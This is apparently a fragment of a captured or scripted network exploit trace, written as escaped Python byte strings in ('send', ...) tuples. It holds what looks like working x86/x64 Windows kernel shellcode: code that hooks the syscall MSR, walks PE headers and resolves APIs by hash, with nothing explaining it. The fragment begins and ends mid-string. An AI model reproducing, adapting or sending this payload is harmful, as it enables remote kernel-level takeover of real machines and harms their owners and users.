\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 